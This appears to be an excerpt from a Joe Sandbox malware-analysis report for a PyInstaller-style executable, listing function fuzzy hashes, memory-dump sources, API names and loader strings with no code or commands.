                                                                                                                                                                                                                                                        • Instruction ID: dc5909aac81b7edcafbb6b07a4fe7eebb6ae6ef432c4c07a5165fa3bd249fc2d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eef01635753a3689cfd7199ced0fb7e0b5b43189aa21453eecf28f9410e22187
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C861C8A2E2E29246F769CA2C846467D6682EF49760F144235DF1DC66F6FE7DEC40C700
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                        • Instruction ID: 0087c00e36c65dcb6ec96fcb086c2449ec30890e3a9f35e12627f6492c8a3f7a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D518476A1665182E7648B29C05423C37B0EB4CB68F245331CF4E977A5EF3AE943D744
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                        • Instruction ID: 87685fc11a6d3c6eded0e31f5fba90b6a7fa219c4fceace61162f9ca960418c7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0517576A19A5186E7248B29C05027C33A5EB48B58F244331CF4E977A4EF3AEA43D784
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                        • Instruction ID: b3f5d9dcf5ea59453ca52c6ac2c8e86c79a03d4317bfff5fbfcc04483f6805c7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE519472B1A65186E7348B29C45063837A0EB4CB58F244331DF4E877A4EF3AEA47D784
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                                                                                        • Instruction ID: b2e4e69788ce047722bbbcdebdd33a1080c33ad95971e55814c09db8b61f92d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7517077B1AA5186E7348B29C04073937A0EB4DB58F244231CF4D977A5EF3AEA82C744
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                                                                                        • Instruction ID: f15209dca46eddf2d2c4326400d98186d31b6526239ad85498153f40be0f139b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F51A536A1965586E7248B29C04063C37A0FB4CB58F244236CF4E977B4EF3AE943D784
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                                                                                        • Instruction ID: 3de5400b86d4ec040e3e0eb84d6e8e1062e4ee9041175a695b36309b718436b5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E517676A1A65186E7248B29C04423937A0EB4DB58F284231CF4F977B5EF3AED43D784
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                        • Instruction ID: 7ba301c73d2275eb336fd1c98fce87a814beb50c3233283d9e1e1dfd64a755a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B41A4D3C0BA9A04E995891C45046F42690DF2ABA0D5C57B4DF9DA33F7FD0E67C6D208
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                        • Opcode ID: 7a7ebbd17873febb15e29de35626f23177de76f7dba359f1eda69606ccc1bea3
                                                                                                                                                                                                                                                        • Instruction ID: a87b819ca74f484d56d5bf1ae01e78a4bb0b539309560d6d48f3432150239a2b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7ebbd17873febb15e29de35626f23177de76f7dba359f1eda69606ccc1bea3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D041F162715A9582EF14CF6AD924169B3A1FB4CFC4B099132EF0DD7B68EE3CD1468304
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3b4b82ba6feb1f2c625fcdd7b78fc6310e7e433b3778e25011fb45a65c2c329c
                                                                                                                                                                                                                                                        • Instruction ID: c5bad024cee93da0e087f7123b79d1c13cfb8b77ce2833610401e8c39518105d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b4b82ba6feb1f2c625fcdd7b78fc6310e7e433b3778e25011fb45a65c2c329c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD31B67271AB4282E7649F26684012D6694EF88B90F049238EB5DD7BE6EF3CD1019708
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 47026fad3db46e1691e12129f37de500b9ca6af24d2cbfa86880e77cbf706e66
                                                                                                                                                                                                                                                        • Instruction ID: 850b2443a09e76f890df361ef882b9f88695a12cfb6163807bb01c75d8fdfa7c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47026fad3db46e1691e12129f37de500b9ca6af24d2cbfa86880e77cbf706e66
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F044716296D58ADB948F69A4526297BE0F7083C0B908039D689C3E14DA7C90618F04
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0095cffb8fe81db1077c877ec2d194bac0958fa6bcac770c2119ba444bc36b37
                                                                                                                                                                                                                                                        • Instruction ID: 3bf72b2cd6f0057082d47e78a926563c8e829ea896e4248ab31ee383c72fc16e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0095cffb8fe81db1077c877ec2d194bac0958fa6bcac770c2119ba444bc36b37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBA001A190A842E0F6449B15A9611202260FB58341B400032E26D810B1BF2CA4108200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                        • Opcode ID: 3ce57ac688b021c07c17bb9d18c3d2db368ff9ca427b7eb3b8bd4dc412038eb8
                                                                                                                                                                                                                                                        • Instruction ID: fea85ef6b151b2fb5ac4dd73cce8769292f754cac388a75dc9271021e2d45f75
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ce57ac688b021c07c17bb9d18c3d2db368ff9ca427b7eb3b8bd4dc412038eb8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B02D8A4E4FB4BA0FA15DBADB8641B423A0FF0C785B851475DA4E86274FF7DB45AC200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA48950: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6ABA43A04,00000000,00007FF6ABA41965), ref: 00007FF6ABA48989
                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6ABA47CF7,FFFFFFFF,00000000,?,00007FF6ABA43101), ref: 00007FF6ABA4766C
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                        • API String ID: 2001182103-930877121
                                                                                                                                                                                                                                                        • Opcode ID: b30a72d36afce0cd8273f42ba79e9994321ef07812378637c8fd6fc8c555bb8b
                                                                                                                                                                                                                                                        • Instruction ID: 03d5ba51cecd66c75d5b0f50789bba356e1da8a481beae76a44b8eae72a6a07a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b30a72d36afce0cd8273f42ba79e9994321ef07812378637c8fd6fc8c555bb8b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08517661B2F6C251FB50EB29E8616BA6251EF9C780F840432DB4EC26F6FE3CE5058740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                        • Opcode ID: 44e53fe94581f3919e9549e222624ce8134aca65504236f29db41f4538cf5799
                                                                                                                                                                                                                                                        • Instruction ID: 35d35c858dffa1a122daabf817f25dbd4f3dfb27bda90d35c94243cebb8adea1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44e53fe94581f3919e9549e222624ce8134aca65504236f29db41f4538cf5799
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6321A7A1B0AA8282E7519B7EA9541796350EF8CBD0F484131DF6ECB3F5FF2CD5958201
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
